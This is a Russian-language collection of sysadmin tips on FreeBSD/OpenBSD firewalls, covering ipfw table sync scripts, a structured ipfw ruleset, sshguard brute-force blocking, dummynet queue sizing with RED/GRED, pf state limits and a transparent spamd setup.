Вот таким скриптом можно периодически синхронизировать на всех сереверах таблицы ipfw #!/bin/sh #CHANGE ME prefix="/etc/tables" host="10.0.0.2" user="table" #standart variables rsync="/usr/local/bin/rsync" agg="/usr/local/bin/aggregate -t -q" ipfw="/usr/local/bin/sudo /sbin/ipfw" ${rsync} -q --rsh=ssh --rsync-path=${rsync} -d ${user}@${host}:${prefix}'/*' ${prefix} TOPROCESS=`find ${prefix}/ -type f ! -name '*.agg' -name 'table*'` for i in $TOPROCESS; do cat $i|awk '{if (! match($1,"/")) print $1"/32"; else print $1}' |$agg >$i.agg t_num=`/usr/bin/basename $i |awk -F "table" '{print $2}'` # Таблица реально существующих клиентов for SUBNET in `\ ${ipfw} table ${t_num} list | /usr/bin/cut -f 1 -d " " | /usr/bin/diff $i.agg - | \ /usr/bin/grep -v [a-z] | /usr/bin/grep ">" | /usr/bin/cut -f 2 -d " " ` ; do ${ipfw} -q table ${t_num} delete $SUBNET & /usr/bin/logger -p local4.info "ip $SUBNET blocked as no customer" & done && \ for SUBNET in `\ ${ipfw} table ${t_num} list | /usr/bin/cut -f 1 -d " " | /usr/bin/diff $i.agg - | \ /usr/bin/grep -v [a-z] | /usr/bin/grep "<" | /usr/bin/cut -f 2 -d " " ` ; do ${ipfw} -q table ${t_num} add $SUBNET & /usr/bin/logger -p local4.info "ip $SUBNET added as customer ip" & done done на выделенном серевере (например биллинге) в /etc/tables складывать файлики table100 table2 после прописывания везде одинаковых пользователей и разброса ключей, получаем эллегантное решение по синхронизации таблиц PS: рабочая часть взята из https://www.opennet.ru/openforum/vsluhforumID3/32321.html#3

Пример использования таблиц блокировки в ipfw [комментарии]

Блокировка производится командой: ipfw add deny ip from "table(1)" to any via em0 /etc/load_table.sh: #!/bin/sh ipfw table 1 flush cat /etc/block.txt | while read cnt ip; do ipfw table 1 add $ip done формат /etc/block.txt: "cnt ip" получем, например, из tcpdump лога атаки: tcpdump -n -i em0 udp and port 80 > ./tcpdump.log cat ./tcpdump.log |cut -d' ' -f3|cut -d'.' -f1,2,3,4|sort|uniq -c |sort -r -n > /etc/block.txt

Пример структурирования правил ipfw (доп. ссылка 1) Автор: Vadim Guchenko [комментарии]

Пример структурирования правил фильтра пакетов ipfw во FreeBSD с целью упрощения их восприятия и уменьшения вероятности допущения ошибок. Исторически так сложилось, что правила файрвола в rc.firewall написаны в плохом и труднопонимаемом стиле: входящие и исходящие пакеты проходят один и тот же набор правил. Многие используют этот скрипт как образец для написания собственного набора правил и наступают на одни и те же грабли. Как минимум, с натом. На самом деле ipfw очень удобен, если писать список правил как некую программу - с разбиением на мелкие подпрограммы (блоки) и добавлением комментариев. При этом надо руководствоваться рядом соглашений: 1. Весь трафик первым делом делится на входящий и исходящий. Каждый вид трафика обрабатывается в отдельном блоке. В качестве еще одного блока можно выделить трафик через интерфейс lo0. Слова in и out после первоначального разделения трафика не используются. 2. Входящий трафик делится на а) трафик, адресованный данному серверу; б) броадкасты; в) мультикасты; г) трафик, идущий транзитом. Каждый из видов трафика обрабатывается в отдельном блоке. Слово me после разделения трафика не используется. 3. Ветвление на блоки происходит по ip-адресам. Имена интерфейсов используются по возможности как можно реже и только тогда, когда без них не обойтись. В частности, при написании правил антиспуфинга. При использовании имен интерфейсов крайне не рекомендуется использовать слово via. В зависимости от блока (входящий или исходящий трафик) рекомендуется использовать слова xmit или recv. Это повышает читабельность. 4. Все строки с правилами нумеруются (там где это допустимо). Нумерация строго возрастающая. Рекомендуемый шаг между соседними номерами 100. 5. Блок занимает строго фиксированный диапазон номеров строк ipfw. Номер строки, с которой начинается блок, указывается в комментарии в начале этого блока. Переход на блок происходит только на его начало. Переход в середину блока недопустим. 6. Блок всегда заканчивается строкой allow ip from any to any или deny ip from any to any. Исключение составляет ситуация, когда один блок должен выполняться следом за другим. Даже если блок пустой (например, броадкасты или мультикасты не используются), все равно лучше поместить в него это единственное правило, чем удалять блок целиком. Возможно в будущем туда что-нибудь допишется. Пример я как-то уже приводил несколько лет назад. Приведу еще раз для трех разных серверов. Макросы, начинающиеся с %, заменятся на блоки ip-адресов. На всех серверах дефолтное 65535 правило: allow ip from any to any. Правила на центральном роутере/шлюзе в инет: #!/bin/sh -e fwcmd="echo" # Интерфейсы, подключенные к Интернету xmit_iface_inet="{ xmit fxp1 or xmit fxp2 }" recv_iface_inet="{ recv fxp1 or recv fxp2 }" # Ограничение количества ping-пакетов, уходящих на аплинка $fwcmd pipe 10 config bw 5Kbit/s ###################################################################### ## Разделение трафика в зависимости от направления (нумерация с 100) ###################################################################### # Трафик через интерфейс lo0 $fwcmd add 100 allow ip from any to any via lo0 # Исходящий трафик $fwcmd add 200 skipto 30000 ip from any to any out ###################################################################### ## Входящий трафик (нумерация с 500) ###################################################################### # Съем трафика для статистики $fwcmd add 500 divert 18000 ip from any to any $recv_iface_inet # NAT-трансляция входящих пакетов $fwcmd add 700 divert 8668 ip from any to %ip.nat $recv_iface_inet ##----------------------------------------------------------------------------- ## Антиспуфинг (нумерация с 1000) ##----------------------------------------------------------------------------- # Интерфейсы Интернета $fwcmd add 1000 deny log ip from %global.internal to any $recv_iface_inet ##----------------------------------------------------------------------------- ## Разделение трафика в зависимости от получателя пакета (нумерация с 5000) ##----------------------------------------------------------------------------- # Трафик, адресованный серверу $fwcmd add 5000 skipto 10000 ip from any to me # Броадкасты $fwcmd add 5100 skipto 20000 ip from any to 255.255.255.255 # Мультикасты $fwcmd add 5200 skipto 25000 ip from any to 224.0.0.0/4 ##----------------------------------------------------------------------------- ## Трафик, идущий транзитом (нумерация с 6000) ##----------------------------------------------------------------------------- # Запрещаем трафик на закрытые адреса магистрали $fwcmd add 6000 deny log ip from any to %global.backbone.private # Разрешаем остальной трафик $fwcmd add 6300 allow ip from any to any ##----------------------------------------------------------------------------- ## Трафик, адресованный серверу (нумерация с 10000) ##----------------------------------------------------------------------------- # Разрешаем установленные TCP-соединения $fwcmd add 10000 allow tcp from any to any established # Разрешаем фрагменты IP-пакетов $fwcmd add 10100 allow ip from any to any frag # Разрешаем пакеты, удовлетворяющие динамическим правилам $fwcmd add 10200 check-state # Разрешаем OSPF-пакеты $fwcmd add 10300 allow ospf from %global.backbone to any # Разрешаем GRE-пакеты $fwcmd add 10400 allow gre from any to any ##----------------------------------------------------------------------------- ## Службы сервера (нумерация с 12000) ##----------------------------------------------------------------------------- # SSH $fwcmd add 12000 deny tcp from %deny.ssh to %ip.ssh 22 $fwcmd add 12100 allow tcp from %allow.ssh to %ip.ssh 22 # BGP $fwcmd add 12200 deny tcp from %deny.bgp to %ip.bgp 179 $fwcmd add 12300 allow tcp from %allow.bgp to %ip.bgp 179 # SNMP $fwcmd add 12400 allow udp from %allow.snmp to %ip.snmp 161,1161 ##----------------------------------------------------------------------------- ## Завершающие правила для трафика, адресованного серверу (нумерация с 18000) ##----------------------------------------------------------------------------- # Разрешаем ICMP-пакеты $fwcmd add 18000 allow icmp from any to any # Разрешаем работу traceroute $fwcmd add 18100 unreach port udp from any to any 33434-33584 # Запрещаем соединения на 113 порт (ident) $fwcmd add 18200 reset tcp from any to any 113 # Запрещаем соединения на 1080 порт (socks check) $fwcmd add 18300 reset tcp from any to any 1080 # Запрещаем остальной трафик $fwcmd add 18400 deny log ip from any to any ##----------------------------------------------------------------------------- ## Броадкасты (нумерация с 20000) ##----------------------------------------------------------------------------- # Разрешаем SNMP trap'ы от ИБП $fwcmd add 20000 allow udp from %global.backbone to any 162 # Разрешаем NTP-пакеты $fwcmd add 20100 allow udp from %global.backbone to %global.backbone.broadcast 123 # Запрещаем остальной трафик $fwcmd add 20200 deny log ip from any to any ##----------------------------------------------------------------------------- ## Мультикасты (нумерация с 25000) ##----------------------------------------------------------------------------- # Разрешаем OSPF-пакеты $fwcmd add 25000 allow ospf from %global.backbone to 224.0.0.0/24{5,6} # Разрешаем общие IGMP и DVMRP-пакеты $fwcmd add 25100 allow igmp from %global.backbone to 224.0.0.0/24{1,2,4} $fwcmd add 25200 allow igmp from %ip.link.iskranet-gw to 224.0.0.0/24{1,2} # Разрешаем трафик TVoIP $fwcmd add 25300 allow ip from %ip.ext.tvoip to 224.2.153.173 # Запрещаем остальной трафик $fwcmd add 25400 deny log ip from any to any ###################################################################### ## Исходящий трафик (нумерация с 30000) ###################################################################### # Запрещаем отправку пакетов, предназначенных для внутрисетевых адресов, # на шлюз по умолчанию $fwcmd add 30000 deny ip from any to %global.internal $xmit_iface_inet # Запрещаем отправку в Интернет пакетов Netbios $fwcmd add 30100 deny tcp from any to any 135,139,445 $xmit_iface_inet # Запрещаем отправку пакетов в Интернет для клиентов, которые отключены # от Интернета $fwcmd add 30200 skipto 30350 ip from %allow.internet to any $xmit_iface_inet $fwcmd add 30300 deny ip from any to any $xmit_iface_inet # Шейпинг ping-пакетов $fwcmd add 30350 skipto 30400 icmp from %group.ping-shaping to any icmptypes 8 $xmit_iface_inet $fwcmd add 30351 pipe 10 icmp from any to any icmptypes 8 $xmit_iface_inet # Съем трафика для статистики $fwcmd add 30400 divert 18001 ip from any to any $xmit_iface_inet # NAT-трансляция исходящих пакетов $fwcmd add 30800 divert 8668 ip from 192.168.0.0/16 to any $xmit_iface_inet #$fwcmd add 30900 allow ip from %ip.nat to any $xmit_iface_inet # Направляем пакеты в нужные интерфейсы аплинков в зависимости от их src-адреса $fwcmd add 31000 fwd %ip.link.krastelecom-gw ip from %ip.link.krastelecom to any $xmit_iface_inet $fwcmd add 31100 fwd %ip.link.iskranet-gw ip from %ip.link.iskranet to any $xmit_iface_inet # Динамическое правило для доступа с данного сервера к внешним службам по UDP $fwcmd add 31200 allow udp from me to any keep-state ##----------------------------------------------------------------------------- ## Аккаунтинг трафика (нумерация с 40000) ##----------------------------------------------------------------------------- # Трафик Интернета $fwcmd add 40000 skipto 40200 ip from %global.internal to %group.accounting $fwcmd add 40100 divert 17000 ip from any to %group.accounting ###################################################################### Правила на сервере доступа: #!/bin/sh -e fwcmd="echo" # Интерфейс, подключенный к клиентскому сегменту iface_clients=fxp0 # Интерфейсы VPN iface_vpns=ng* ###################################################################### ## Разделение трафика в зависимости от направления (нумерация с 100) ###################################################################### # Трафик через интерфейс lo0 $fwcmd add 100 allow ip from any to any via lo0 # Исходящий трафик $fwcmd add 200 skipto 30000 ip from any to any out ###################################################################### ## Входящий трафик (нумерация с 500) ###################################################################### # Открываем доступ к DHCP-серверу с незарегистрированных адресов, запрещаем # с них любой другой трафик $fwcmd add 500 allow udp from %clients.unreg to %srv.dhcp 67 $fwcmd add 600 allow udp from %clients.unreg to 255.255.255.255 67 $fwcmd add 700 deny ip from %clients.unreg to any ##----------------------------------------------------------------------------- ## Антиспуфинг (нумерация с 1000) ##----------------------------------------------------------------------------- # Интерфейс клиентов $fwcmd add 1000 skipto 5000 ip from 0.0.0.0 to any recv $iface_clients $fwcmd add 1100 skipto 5000 ip from %clients to any recv $iface_clients $fwcmd add 1200 deny log ip from any to any recv $iface_clients # Интерфейсы VPN $fwcmd add 1300 skipto 5000 ip from %clients to any recv $iface_vpns $fwcmd add 1400 skipto 5000 ip from any to any verrevpath recv $iface_vpns $fwcmd add 1500 deny log ip from any to any recv $iface_vpns ##----------------------------------------------------------------------------- ## Разделение трафика в зависимости от получателя пакета (нумерация с 5000) ##----------------------------------------------------------------------------- # Трафик, адресованный серверу $fwcmd add 5000 skipto 10000 ip from any to me # Броадкасты $fwcmd add 5100 skipto 20000 ip from any to 255.255.255.255 $fwcmd add 5200 skipto 20000 ip from any to %global.backbone.broadcast $fwcmd add 5300 skipto 20000 ip from any to %clients.broadcast # Мультикасты $fwcmd add 5400 skipto 25000 ip from any to 224.0.0.0/4 ##----------------------------------------------------------------------------- ## Трафик, идущий транзитом (нумерация с 6000) ##----------------------------------------------------------------------------- # Запрещаем трафик на закрытые адреса магистрали $fwcmd add 6000 deny log ip from any to %global.backbone.private # Разрешаем любой трафик, идущий c VPN-адресов клиентов, которым открыт доступ # к услугам сети, и обратно $fwcmd add 6100 allow ip from %access.allow to any $fwcmd add 6200 allow ip from any to %access.allow # Разрешаем трафик, идущий от клиентов на DNS-резолвер и обратно $fwcmd add 6300 allow ip from any to %global.srv.resolver $fwcmd add 6400 allow ip from %global.srv.resolver to any # Разрешаем трафик, идущий от клиентов на веб-сервер сети и обратно $fwcmd add 6500 allow ip from any to %global.srv.http $fwcmd add 6600 allow ip from %global.srv.http to any # Разрешаем эхо-запросы, идущие на локальные адреса клиентов, и эхо-ответы # c этих адресов $fwcmd add 6700 allow icmp from any to %clients icmptypes 8 $fwcmd add 6800 allow icmp from %clients to any icmptypes 0 # Запрещаем остальной трафик $fwcmd add 6900 deny log ip from any to any ##----------------------------------------------------------------------------- ## Трафик, адресованный серверу (нумерация с 10000) ##----------------------------------------------------------------------------- # Разрешаем установленные TCP-соединения $fwcmd add 10000 allow tcp from any to any established # Разрешаем фрагменты IP-пакетов $fwcmd add 10100 allow ip from any to any frag # Разрешаем пакеты, удовлетворяющие динамическим правилам $fwcmd add 10200 check-state # Разрешаем OSPF-пакеты $fwcmd add 10300 allow ospf from %global.backbone to any # Разрешаем GRE-пакеты $fwcmd add 10400 allow gre from any to any ##----------------------------------------------------------------------------- ## Службы сервера (нумерация с 12000) ##----------------------------------------------------------------------------- # SSH $fwcmd add 12000 allow tcp from %srv.ssh.allow to %srv.ssh 22 # DHCP $fwcmd add 12100 allow udp from %srv.dhcp.allow to %srv.dhcp 67 # PPTP $fwcmd add 12200 allow tcp from %srv.pptp.allow to %srv.pptp 1723 # SNMP $fwcmd add 12300 allow udp from %srv.snmp.allow to %srv.snmp 161,1161 ##----------------------------------------------------------------------------- ## Завершающие правила для трафика, адресованного серверу (нумерация с 18000) ##----------------------------------------------------------------------------- # Разрешаем ICMP-пакеты $fwcmd add 18000 allow icmp from any to any # Разрешаем работу traceroute $fwcmd add 18100 unreach port udp from any to any 33434-33584 # Запрещаем соединения на 80 порт (samba) $fwcmd add 18200 reset tcp from any to any 80 # Запрещаем соединения на 113 порт (ident) $fwcmd add 18300 reset tcp from any to any 113 # Запрещаем соединения на 1080 порт (socks check) $fwcmd add 18400 reset tcp from any to any 1080 # Запрещаем остальной трафик $fwcmd add 18500 deny log ip from any to any ##----------------------------------------------------------------------------- ## Броадкасты (нумерация с 20000) ##----------------------------------------------------------------------------- # Разрешаем SNMP trap'ы от ИБП $fwcmd add 20000 allow udp from %global.backbone to any 162 # Разрешаем NTP-пакеты $fwcmd add 20100 allow udp from %global.backbone to %global.backbone.broadcast 123 # Разрешаем поиск DHCP-сервера $fwcmd add 20200 allow udp from %srv.dhcp.allow to any 67 # Запрещаем остальной трафик $fwcmd add 20300 deny log ip from any to any ##----------------------------------------------------------------------------- ## Мультикасты (нумерация с 25000) ##----------------------------------------------------------------------------- # Разрешаем OSPF-пакеты $fwcmd add 25000 allow ospf from %global.backbone to 224.0.0.0/24{5,6} # Разрешаем общие IGMP и DVMRP-пакеты $fwcmd add 25100 allow igmp from %global.backbone to 224.0.0.0/24{1,2,4} $fwcmd add 25200 allow igmp from %clients to 224.0.0.0/24{1,2} # Разрешаем подписку на группы TVoIP $fwcmd add 25300 allow igmp from %clients to %global.srv.tvoip.groups # Разрешаем трафик TVoIP $fwcmd add 25400 allow ip from %global.srv.tvoip to %global.srv.tvoip.groups # Запрещаем остальной трафик $fwcmd add 25500 deny log ip from any to any ###################################################################### ## Исходящий трафик (нумерация с 30000) ###################################################################### # Динамическое правило для доступа с данного сервера к внешним службам по UDP $fwcmd add 30000 allow udp from me to any keep-state ###################################################################### Правила на сервере служб: #!/bin/sh -e fwcmd="echo" ###################################################################### ## Разделение трафика в зависимости от направления (нумерация с 100) ###################################################################### # Трафик через интерфейс lo0 $fwcmd add 100 allow ip from any to any via lo0 # Исходящий трафик $fwcmd add 200 skipto 30000 ip from any to any out ###################################################################### ## Входящий трафик (нумерация с 1000) ###################################################################### ##----------------------------------------------------------------------------- ## Разделение трафика в зависимости от получателя пакета (нумерация с 5000) ##----------------------------------------------------------------------------- # Трафик, адресованный серверу $fwcmd add 5000 skipto 10000 ip from any to me # Броадкасты $fwcmd add 5100 skipto 20000 ip from any to 255.255.255.255 $fwcmd add 5150 skipto 20000 ip from any to %group.backbone_broadcast # Мультикасты $fwcmd add 5200 skipto 25000 ip from any to 224.0.0.0/4 ##----------------------------------------------------------------------------- ## Трафик, идущий транзитом (нумерация с 6000) ##----------------------------------------------------------------------------- # Запрещаем весь трафик $fwcmd add 6000 deny log ip from any to any ##----------------------------------------------------------------------------- ## Трафик, адресованный серверу (нумерация с 10000) ##----------------------------------------------------------------------------- # Преобразовываем запросы к DNS-резолверу $fwcmd add 10000 divert 8669 ip from %allow.resolver_internet to %ip.resolver # Разрешаем установленные TCP-соединения $fwcmd add 10100 allow tcp from any to any established # Разрешаем фрагменты IP-пакетов $fwcmd add 10200 allow ip from any to any frag # Разрешаем пакеты, удовлетворяющие динамическим правилам $fwcmd add 10300 check-state # Разрешаем OSPF-пакеты $fwcmd add 10400 allow ospf from %group.backbone to any ##----------------------------------------------------------------------------- ## Службы сервера (нумерация с 12000) ##----------------------------------------------------------------------------- # SSH $fwcmd add 12000 deny tcp from %deny.ssh to %ip.ssh 22 $fwcmd add 12100 allow tcp from %allow.ssh to %ip.ssh 22 # DNS-резолвер $fwcmd add 12200 deny { tcp or udp } from %deny.resolver to %ip.resolver 53 $fwcmd add 12300 allow { tcp or udp } from %allow.resolver to %ip.resolver 53 # DNS-сервер $fwcmd add 12400 deny { tcp or udp } from %deny.dns to %ip.dns 53 $fwcmd add 12500 allow { tcp or udp } from %allow.dns to %ip.dns 53 # DNS-кэш $fwcmd add 12600 deny { tcp or udp } from %deny.dnscache to %ip.dnscache 53 $fwcmd add 12700 allow { tcp or udp } from %allow.dnscache to %ip.dnscache 53 # NTP-сервер $fwcmd add 12800 deny udp from %deny.ntp to %ip.ntp 123 $fwcmd add 12900 allow udp from %allow.ntp to %ip.ntp 123 # IRC $fwcmd add 13000 deny tcp from %deny.irc to %ip.irc 6667-6669 $fwcmd add 13100 allow tcp from %allow.irc to %ip.irc 6667-6669 $fwcmd add 13200 deny icmp from any to %ip.irc icmptypes 8 # HTTP $fwcmd add 13700 deny tcp from %deny.http to %ip.http 80,443 $fwcmd add 13800 allow tcp from %allow.http to %ip.http 80,443 # SMTP $fwcmd add 13900 deny tcp from %deny.smtp to %ip.smtp 25 $fwcmd add 14000 allow tcp from %allow.smtp to %ip.smtp 25 $fwcmd add 14100 deny tcp from %group.internal to %ip.smtp 25 $fwcmd add 14200 allow tcp from any to %ip.smtp 25 # POP $fwcmd add 14300 deny tcp from %deny.pop to %ip.pop 110 $fwcmd add 14400 allow tcp from %allow.pop to %ip.pop 110 # SNMP $fwcmd add 14500 allow udp from %allow.snmp to %ip.snmp 161,1161 ##----------------------------------------------------------------------------- ## Завершающие правила для трафика, адресованного серверу (нумерация с 18000) ##----------------------------------------------------------------------------- # Разрешаем ICMP-пакеты $fwcmd add 18000 allow icmp from any to any # Разрешаем работу traceroute $fwcmd add 18100 unreach port udp from any to any 33434-33584 # Запрещаем соединения на 113 порт (ident) $fwcmd add 18200 reset tcp from any to any 113 # Запрещаем соединения на 1080 порт (socks check) $fwcmd add 18300 reset tcp from any to any 1080 # Запрещаем остальной трафик $fwcmd add 18400 deny log ip from any to any ##----------------------------------------------------------------------------- ## Броадкасты (нумерация с 20000) ##----------------------------------------------------------------------------- # Разрешаем SNMP trap'ы от ИБП $fwcmd add 20000 allow udp from %group.backbone to any 162 # Запрещаем остальной трафик $fwcmd add 20100 deny log ip from any to any ##----------------------------------------------------------------------------- ## Мультикасты (нумерация с 25000) ##----------------------------------------------------------------------------- # Разрешаем OSPF-пакеты $fwcmd add 25000 allow ospf from %group.backbone to 224.0.0.0/24{5,6} # Запрещаем остальной трафик $fwcmd add 25100 deny log ip from any to any ###################################################################### ## Исходящий трафик (нумерация с 30000) ###################################################################### # Преобразовываем ответы DNS-резолвера $fwcmd add 30000 divert 8669 ip from %ip.dnscache to %allow.resolver_internet # Динамическое правило для доступа с данного сервера к внешним службам по UDP $fwcmd add 30100 allow udp from me to any keep-state ##----------------------------------------------------------------------------- ## Аккаунтинг трафика (нумерация с 40000) ##----------------------------------------------------------------------------- # Трафик почтового сервера (POP) $fwcmd add 40000 divert 17000 tcp from %ip.pop to %group.accounting

Порядок прохождения пакетов в пакетных фильтрах FreeBSD (доп. ссылка 1) Автор: butcher [комментарии]

Порядок прохождения пакетов при одновременном использовании ipfilter, pf и ipfw: При загрузке фильтров модулями, порядок будет определяться порядком загрузки модулей. Причина здесь в том, что пакетные фильтры регистрируют себя в pfil(9). При включении всех фильтров в ядро порядок будет определять SYSINIT. Чтобы определить порядок, нужно открыть файл sys/kernel.h. В нём определён порядок инициализации определённых подсистем. Теперь, простейшее: # grep DECLARE_MODULE netinet/ip_fw_pfil.c DECLARE_MODULE(ipfw, ipfwmod, SI_SUB_PROTO_IFATTACHDOMAIN, SI_ORDER_ANY); # grep DECLARE_MODULE contrib/pf/net/pf_ioctl.c DECLARE_MODULE(pf, pf_mod, SI_SUB_PROTO_IFATTACHDOMAIN, SI_ORDER_FIRST); # grep DECLARE_MODULE contrib/ipfilter/netinet/mlfk_ipl.c DECLARE_MODULE(ipfilter, ipfiltermod, SI_SUB_PROTO_DOMAIN, SI_ORDER_ANY); От сюда следует: первым будет ipfilter, затем pf, затем ipfw.

Автоблокирование атак по подбору паролей (brute force) в SSH под FreeBSD (доп. ссылка 1) Автор: Roman Y. Bogdanov [комментарии]

Устанавливаем sshguard из портов: cd /usr/ports/security/sshguard make install clean WITH_PF=yes Настраиваем перенаправление логов в sshguard echo "auth.info;authpriv.info |exec /usr/local/sbin/sshguard" >> /etc/syslog.conf Правила блокировки по таблице, /etc/pf.conf internet="vlan50" table persist block in quick on $internet from label "ssh bruteforce" Перечитываем измененные файлы конфигурации PF и syslogd: pfctl -f /etc/pf.conf /etc/rc.d/syslogd restart Тестируем попробовав подобрать пароли: shguard[1048576]: Started successfully [(a,p,s)=(4, 420, 1200)], now ready to scan. sshd[1048577]: Invalid user administrador from 21.138.24.51 sshd[1048579]: Invalid user publica from 21.138.24.51 sshd[1048580]: Invalid user rbecerril from 21.138.24.51 sshd[1048581]: Invalid user rvences from 21.138.24.51 sshguard[1048582]: Blocking 21.138.24.51: 4 failures over 15 seconds. shguard[1048583]: Releasing 21.138.24.51 after 490 seconds.

Расчет размера очереди для pipe с заданной пропускной способностью (доп. ссылка 1) [комментарии]

> Работает шейпер на dummynet, наблюдается некотороая потеря > траффика. Hавскидку проблема в дефолтных значениях размера очереди (50 пакетов) > для pipe'ов от 32 до 512 Кбит\с. Скорее всего, поток не влезает в очередь и > часть пакетов отбрасывается. Как правильно рассчитать размер очереди для > каждого pipe в отдельности? Eugene Grosbein: Pipe и должен отбрасывать пакеты, иначе какой же это шейпер? Ты не можешь увеличивать длину очереди бесконечно, потому что задержки вырастут настолько, что соединение начнет рвать сам юзер :-) Hа таких низких скоростях размер очереди надо бы, наоборот, уменьшать, чтобы не допустить гигантских задержек типа нескольких тысяч милисекунд. А если хочешь и рыбку съесть, и потерь иметь минимум, то читай-ка ты про RED/GRED на unixfaq.ru и делай не просто pipe, а queue/pipe с gred. Рекомендую делать w_q=0.002, max_p=0.1, min=q/10, max=3*min, где q - длина очереди, q=20 для скоростей меньше 100Kbit/s, q=30 для скоростей от 100 до 300Kbit/s и q=50 для скоростей 512Kbit/s и выше. ---------- Sergey A Yakovets: Пол-дня игрался с параметром queue. В итоге подобрал на первый взгляд кое-что подходящее. Алгоритм\мысли были следующие: Дано: асинхронный спутниковый Инет. Входящий канал - 1024 Кбит\с. Опытным путем установлено, что проблемы с потерей траффика (до 10% от общего объема) возникают при многопотоковых http\ftp закачках, т.к. спутниковый провайдер в этом случае может отдать поток на все 1024 Кбит\с. При серфинге все нормально. Исходя из этого, мною были сделаны некоторые расчеты: При максимальной пропускной способности входящего спутникового канала в 1024 Кбит\с и размере пакета в 1500 байт, пропускная способность канала равна ~ 87 пакетов\сек. В это же время, для канала в 128 Кбит\с пропускная способность равна ~ 11 пакетов\сек. Гипотетическая разница, при условии что на юзера будет идти поток в 1024 Кбит\с, а отдаваться только 128 Кбит\с, может составить 76 пакетов\сек. Итого, опытным путем установлено: - (было) при дефолтной очереди в 50 пакетов на pipe 128 Кбит\с потери 10% - при размере очереди = разница*2 = 150 пакетов потери 2% - (стало) при размере очереди = разница*3 = 230 пакетов потери 0% Серфинг не страдает, задержек нет. Закачка идет на скорости шейпера, потерь нет. Пробовал другой вариант. Hа pipe 128 Кбит\с было выставлено gred 0.002/3/6/0.1 В итоге - огромные потери, т.к. канал практически все время работал на скорости пакетов намного больше чем max_th*2. Изменение параметров до gred 0.002/50/150/0.1 не влияло на результат, т.к. дефолтный размер очереди в 50 пакетов часто переполнялся и gred не имел никакого действия. --------- Что такое алгоритмы RED и gentle RED у ipfw? http://unixfaq.ru/index.pl?req=qs&id=310 Ответ на этот вопрос скомпилирован из статей в конференции RU.UNIX.BSD от следующих авторов: Valentin Ermolaev, Alexander V. Naumochkin, Jen Linkova. Сокращение RED означает "Random Early Detection". Метод используется для выравнивания всплесков трафика. Основным критерием метода является так называемая перегрузка. В качестве показателя перегрузки avg используется вычисляемое среднее значение длины очереди пакетов, принадлежащей к определенной сессии TCP. Использование усредненного, а не мгновенного значения очереди позволяет отделить кратковременные перегрузки, которые могут быть нормально обработаны устройством и сетью, от длительных перегрузок, которые могут утопить сеть. Алгоритмически это выглядит так: В момент прихода пакета ; ; if (очередь не пуста) ; ; ; ; avg = (1 - w_q)*avg + w_q*q ; ; else ; ; ; ; m = f(time - q_time) ; ; ; ; avg = (1 - w_q)^m * avg; где avg -средний размер очереди q_time - "start of queue idle time" q - размер очереди w_q - вес очереди (фиксированный параметр) f() - линейная функий от времени В /usr/src/sys/netinet/ip_dummynet.c по этому поводу написано следующее: * RED algorithm * * RED calculates the average queue size (avg) using a low-pass filter * with an exponential weighted (w_q) moving average: * avg <- (1-w_q) * avg + w_q * q_size * where q_size is the queue length (measured in bytes or * packets). * * If q_size == 0, we compute the idle time for the link, and set * avg = (1 - w_q)^(idle/s) * where s is the time needed for transmitting a medium-sized packet. - что полностью согласуется с приведенными выше формулами. Далее в алгоритме вводятся два порога уровня перегрузки: min_th и max_th. Когда уровень перегрузки ниже первого порога min_th, то пакеты не отбрасываются. Если уровень перегрузки находится между двумя порогами, пакеты отбрасываются с линейно возврастающей вероятностью из диапазона от 0 до конфигурируемой величины max_p, которая достигается при достижении второго порога max_th. Выше порога max_th отбрасываются все пакеты. Такой метод вычисления позволяет сглаживать всплески трафика - для сравнения в первой из статей (см. ниже) на одном графике приводятся и изменение размера очереди q, и усредненного размера очереди (avg) от времени. В той же статье есть выкладки на тему значений w_q. При gentle RED ситуация выглядит чуть сложнее: Если перегрузки лежит в интервале от min_th до max_th, то пакеты отбрасываются с линейно возрастающей от 0 до max_p вероятностью. Когда перегрузка превышает max_th, но не превышет 2*max_th, пакеты отбрасываются не все (как в случае RED), а с линейно возрастающей от max_p до 1 вероятностью. Все пакеты отбрасываются только после превышения перегрузки канала значения 2*max_th. Вот как это сделано в ip_dummynet.c: если длина очереди > max_th, то в случае gred вероятность отбрасывания пакета вычисляется как ; ; p_b = c_3 * avg - c_4 где c_3 = (1 - max_p) / max_th ; ; c_4 = 1 - 2 * max_p В случае просто RED пакет отбрасывается. При загрузке очереди, большей min_th, но меньшей max_th, функция вероятности одинакова и выглядит след. образом: ; ; p_b = c_1 *avg - c_2 где c_1 = max_p / (max_th - min_th), ; ; c_2 = max_p * min_th / (max_th - min_th) Полезные ссылки: 1. http://www.icir.org/floyd/papers/red/red.html 2. http://www.icir.org/floyd/red.html 3. http://www.cisco.com/warp/public/732/Tech/red/

Как увеличить размер таблицы состояний активных соединений в pf (доп. ссылка 1) [обсудить]

Проверяем число соединений в таблице и сравнимаем с текущим лимитом: # pfctl -s state | wc -l 10000 # pfctl -s memory | grep states states hard limit 10000 Таблица переполнена, поднимает лимит до 20000: set limit states 20000 Перечитываем конфигурацию pf: pfctl -O -f /etc/pf.conf

Прозрачный переброс SMTP трафика к spamd, используя pf (доп. ссылка 1) Автор: undeadly.org [комментарии]

Ниже описано как в разрыв между внешним миром и локальной сетью поставить машину на базе OpenBSD, на которой будет в прозрачном режиме отсеиваться спам через spamd. fxp2 - внешний интерфейс fxp0 - интерфейс локальной сети Поднимаем бридж: ifconfig fxp0 up ifconfig fxp2 inet 172.16.5.111 netmask 255.255.255.0 up route add default 172.16.5.1 ifconfig bridge0 create brconfig bridge0 add fxp0 add fxp2 up Проверяем включен ли форвадинг пакетов между интерфейсами и загружаем правила пакетного фильтра pf: sysctl net.inet.ip.forwarding=1 pfctl -ef /etc/pf.conf где /etc/pf.conf: ext_if="fxp2" table <spamd> persist table <spamd-white> persist rdr on $ext_if inet proto tcp from <spamd> to port smtp \ -> 127.0.0.1 port spamd rdr on $ext_if inet proto tcp from !<spamd-white> to port smtp \ -> 127.0.0.1 port spamd # "log" so you can watch the connections getting trapped pass in log on $ext_if route-to lo0 inet proto tcp to 127.0.0.1 port spamd

Как избавится от роста висящих FIN_WAIT_2 соединений под FreeBSD [комментарии]

Если используется ipfw2 и keep-state правила, то от непрерывного роста соединений со статусом FIN_WAIT_2 помогает: sysctl -w net.inet.ip.fw.dyn_keepalive=0

Как вести лог блокировок в iptables и ipfw [комментарии]

